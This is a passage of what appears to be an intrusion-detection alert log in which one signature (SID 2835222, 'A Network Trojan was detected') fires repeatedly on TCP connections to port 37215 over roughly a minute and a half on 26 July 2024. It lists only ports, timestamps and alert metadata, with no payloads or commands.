                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:52.051458+0200
                SID:2835222
                Source Port:47638
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:23.379714+0200
                SID:2835222
                Source Port:38850
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:56.351153+0200
                SID:2835222
                Source Port:50364
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:23.037958+0200
                SID:2835222
                Source Port:56274
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:43:32.176089+0200
                SID:2835222
                Source Port:44444
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:56.990706+0200
                SID:2835222
                Source Port:46810
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:24.293059+0200
                SID:2835222
                Source Port:45806
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:24.179292+0200
                SID:2835222
                Source Port:35326
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:43:10.500954+0200
                SID:2835222
                Source Port:46022
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:47.925389+0200
                SID:2835222
                Source Port:60940
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:54.104305+0200
                SID:2835222
                Source Port:33434
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:24.287042+0200
                SID:2835222
                Source Port:50956
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:22.848943+0200
                SID:2835222
                Source Port:47726
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:22.859475+0200
                SID:2835222
                Source Port:37242
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:24.302989+0200
                SID:2835222
                Source Port:48720
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:52.051416+0200
                SID:2835222
                Source Port:44004
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:03.751831+0200
                SID:2835222
                Source Port:34650
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:37.657528+0200
                SID:2835222
                Source Port:55560
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:43:04.861870+0200
                SID:2835222
                Source Port:47946
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:43:22.185652+0200
                SID:2835222
                Source Port:38764
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:27.000927+0200
                SID:2835222
                Source Port:53690
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:56.990919+0200
                SID:2835222
                Source Port:32874
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:32.923596+0200
                SID:2835222
                Source Port:40660
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:32.927145+0200
                SID:2835222
                Source Port:40074
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:40.644350+0200
                SID:2835222
                Source Port:41618
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:22.852003+0200
                SID:2835222
                Source Port:43240
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:03.752052+0200
                SID:2835222
                Source Port:50902
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:44.139346+0200
                SID:2835222
                Source Port:52906
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:56.281857+0200
                SID:2835222
                Source Port:49604
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:24.317186+0200
                SID:2835222
                Source Port:60922
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:30.811966+0200
                SID:2835222
                Source Port:38428
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:22.862975+0200
                SID:2835222
                Source Port:55412
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:24.287646+0200
                SID:2835222
                Source Port:54418
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:22.851193+0200
                SID:2835222
                Source Port:33114
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:54.213653+0200
                SID:2835222
                Source Port:35404
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:43:24.299160+0200
                SID:2835222
                Source Port:39274
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:32.910259+0200
                SID:2835222
                Source Port:38342
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:03.751966+0200
                SID:2835222
                Source Port:55554
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:22.878195+0200
                SID:2835222
                Source Port:46688
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:43:06.796928+0200
                SID:2835222
                Source Port:52444
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:24.803531+0200
                SID:2835222
                Source Port:52480
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:38.562210+0200
                SID:2835222
                Source Port:35302
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:22.960183+0200
                SID:2835222
                Source Port:50154
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:44.230369+0200
                SID:2835222
                Source Port:41276
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:52.054187+0200
                SID:2835222
                Source Port:42398
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:24.312752+0200
                SID:2835222
                Source Port:43424
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:43:10.556330+0200
                SID:2835222
                Source Port:50206
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:03.752053+0200
                SID:2835222
                Source Port:44986
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:24.312496+0200
                SID:2835222
                Source Port:52526
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:03.752096+0200
                SID:2835222
                Source Port:49806
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:22.936645+0200
                SID:2835222
                Source Port:39470
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:22.956258+0200
                SID:2835222
                Source Port:57736
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:32.907393+0200
                SID:2835222
                Source Port:42568
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:43:24.648575+0200
                SID:2835222
                Source Port:53336
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:30.889178+0200
                SID:2835222
                Source Port:32956
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:54.209938+0200
                SID:2835222
                Source Port:34768
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:43:26.448365+0200
                SID:2835222
                Source Port:55762
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:24.287647+0200
                SID:2835222
                Source Port:43692
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:38.401724+0200
                SID:2835222
                Source Port:41278
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:03.751839+0200
                SID:2835222
                Source Port:52856
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:42.040798+0200
                SID:2835222
                Source Port:50406
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:43:12.180616+0200
                SID:2835222
                Source Port:45224
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:03.663396+0200
                SID:2835222
                Source Port:57910
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:23.590390+0200
                SID:2835222
                Source Port:57654
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:24.211094+0200
                SID:2835222
                Source Port:37602
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:24.304444+0200
                SID:2835222
                Source Port:47546
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:31.050536+0200
                SID:2835222
                Source Port:36822
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:23.661945+0200
                SID:2835222
                Source Port:39180
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:03.751964+0200
                SID:2835222
                Source Port:48036
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:40.395421+0200
                SID:2835222
                Source Port:44160
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:43:24.816955+0200
                SID:2835222
                Source Port:38450
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:44.373737+0200
                SID:2835222
                Source Port:52906
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:22.851190+0200
                SID:2835222
                Source Port:40700
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:43:22.215537+0200
                SID:2835222
                Source Port:43744
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:56.991979+0200
                SID:2835222
                Source Port:44208
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:43:13.057413+0200
                SID:2835222
                Source Port:38872
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:22.882933+0200
                SID:2835222
                Source Port:36858
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:16.209355+0200
                SID:2835222
                Source Port:39666
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:43:24.642559+0200
                SID:2835222
                Source Port:35940
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:43:10.561145+0200
                SID:2835222
                Source Port:47718
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:43:12.001552+0200
                SID:2835222
                Source Port:60520
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:32.905348+0200
                SID:2835222
                Source Port:54782
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:56.395387+0200
                SID:2835222
                Source Port:55560
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:27.005403+0200
                SID:2835222
                Source Port:59908
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:43:19.293876+0200
                SID:2835222
                Source Port:41900
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:30.951955+0200
                SID:2835222
                Source Port:39040
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:37.657532+0200
                SID:2835222
                Source Port:60716
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:43:32.382470+0200
                SID:2835222
                Source Port:41102
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:23.591416+0200
                SID:2835222
                Source Port:49782
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:56.281347+0200
                SID:2835222
                Source Port:58458
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:43:29.552890+0200
                SID:2835222
                Source Port:53724
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:24.516527+0200
                SID:2835222
                Source Port:47736
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:05.211005+0200
                SID:2835222
                Source Port:52296
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:43:32.267705+0200
                SID:2835222
                Source Port:56216
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:03.751880+0200
                SID:2835222
                Source Port:60248
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:38.409008+0200
                SID:2835222
                Source Port:42608
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:43:10.506247+0200
                SID:2835222
                Source Port:40706
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:43:10.727525+0200
                SID:2835222
                Source Port:54080
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:43:10.502538+0200
                SID:2835222
                Source Port:48660
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:58.930333+0200
                SID:2835222
                Source Port:35804
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:38.337623+0200
                SID:2835222
                Source Port:41322
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:04.832568+0200
                SID:2835222
                Source Port:50558
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:43:10.506248+0200
                SID:2835222
                Source Port:42254
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:03.751794+0200
                SID:2835222
                Source Port:37764
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:22.856698+0200
                SID:2835222
                Source Port:49866
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:23.275589+0200
                SID:2835222
                Source Port:55948
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:31.222334+0200
                SID:2835222
                Source Port:58318
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:38.337666+0200
                SID:2835222
                Source Port:50398
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:03.751922+0200
                SID:2835222
                Source Port:58838
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:03.752050+0200
                SID:2835222
                Source Port:60962
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:23.591415+0200
                SID:2835222
                Source Port:34104
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:22.947099+0200
                SID:2835222
                Source Port:56730
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:43:00.391481+0200
                SID:2835222
                Source Port:40156
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:35.410258+0200
                SID:2835222
                Source Port:50978
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:38.337641+0200
                SID:2835222
                Source Port:52288
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:24.512531+0200
                SID:2835222
                Source Port:35034
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:24.256267+0200
                SID:2835222
                Source Port:52368
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:56.381522+0200
                SID:2835222
                Source Port:38064
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:43:10.506254+0200
                SID:2835222
                Source Port:40118
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:24.296458+0200
                SID:2835222
                Source Port:46866
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:24.303363+0200
                SID:2835222
                Source Port:53444
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:22.891527+0200
                SID:2835222
                Source Port:50244
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:38.391089+0200
                SID:2835222
                Source Port:45300
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:24.303875+0200
                SID:2835222
                Source Port:51932
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:24.318056+0200
                SID:2835222
                Source Port:53650
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:43:02.491089+0200
                SID:2835222
                Source Port:43686
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:24.257547+0200
                SID:2835222
                Source Port:52340
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:24.513939+0200
                SID:2835222
                Source Port:59084
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:27.583241+0200
                SID:2835222
                Source Port:49200
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:03.752014+0200
                SID:2835222
                Source Port:40780
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:03.751843+0200
                SID:2835222
                Source Port:41728
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:24.192951+0200
                SID:2835222
                Source Port:55460
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:56.988799+0200
                SID:2835222
                Source Port:52414
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:43:34.316571+0200
                SID:2835222
                Source Port:55038
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:03.751973+0200
                SID:2835222
                Source Port:45652
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:43:16.004578+0200
                SID:2835222
                Source Port:37442
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:24.256695+0200
                SID:2835222
                Source Port:50370
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:24.259809+0200
                SID:2835222
                Source Port:59310
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:43:21.679013+0200
                SID:2835222
                Source Port:48454
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:24.311829+0200
                SID:2835222
                Source Port:45520
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:44.072216+0200
                SID:2835222
                Source Port:58160
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:23.530735+0200
                SID:2835222
                Source Port:58528
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:24.287779+0200
                SID:2835222
                Source Port:37074
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:24.259211+0200
                SID:2835222
                Source Port:43478
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:24.299869+0200
                SID:2835222
                Source Port:41692
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:38.401665+0200
                SID:2835222
                Source Port:38990
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:03.751887+0200
                SID:2835222
                Source Port:48678
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:22.851126+0200
                SID:2835222
                Source Port:39876
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:23.046713+0200
                SID:2835222
                Source Port:54552
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:23.007527+0200
                SID:2835222
                Source Port:50678
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:43:04.640084+0200
                SID:2835222
                Source Port:49410
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:22.828889+0200
                SID:2835222
                Source Port:37370
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:56.990975+0200
                SID:2835222
                Source Port:54800
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:43:19.035369+0200
                SID:2835222
                Source Port:41962
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:58.930256+0200
                SID:2835222
                Source Port:49584
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:44.348201+0200
                SID:2835222
                Source Port:33408
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:56.987902+0200
                SID:2835222
                Source Port:50588
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:43:12.160666+0200
                SID:2835222
                Source Port:53462
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:25.520316+0200
                SID:2835222
                Source Port:54980
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:35.406708+0200
                SID:2835222
                Source Port:34638
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:43:13.694805+0200
                SID:2835222
                Source Port:36066
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:58.929100+0200
                SID:2835222
                Source Port:49906
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:43:34.311191+0200
                SID:2835222
                Source Port:44926
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:23.508456+0200
                SID:2835222
                Source Port:60380
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:22.851130+0200
                SID:2835222
                Source Port:44406
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:24.286966+0200
                SID:2835222
                Source Port:39034
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:38.606651+0200
                SID:2835222
                Source Port:37128
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:30.726272+0200
                SID:2835222
                Source Port:57802
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:32.905236+0200
                SID:2835222
                Source Port:35840
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:16.209350+0200
                SID:2835222
                Source Port:33104
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:24.287736+0200
                SID:2835222
                Source Port:57460
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:43:06.625710+0200
                SID:2835222
                Source Port:36502
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:35.406707+0200
                SID:2835222
                Source Port:40260
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:43:10.771511+0200
                SID:2835222
                Source Port:33164
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:03.663392+0200
                SID:2835222
                Source Port:51354
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:03.751885+0200
                SID:2835222
                Source Port:53072
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:24.287352+0200
                SID:2835222
                Source Port:39762
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:27.004002+0200
                SID:2835222
                Source Port:38236
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:24.353399+0200
                SID:2835222
                Source Port:59282
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:43:00.392373+0200
                SID:2835222
                Source Port:38874
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:22.858867+0200
                SID:2835222
                Source Port:47718
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:22.798191+0200
                SID:2835222
                Source Port:37716
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:22.922438+0200
                SID:2835222
                Source Port:36994
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:52.052499+0200
                SID:2835222
                Source Port:36772
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:22.858100+0200
                SID:2835222
                Source Port:39172
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:42:32.907412+0200
                SID:2835222
                Source Port:47250
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T17:43:32.175203+0200
                SID:2835222
                Source Port:33206
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
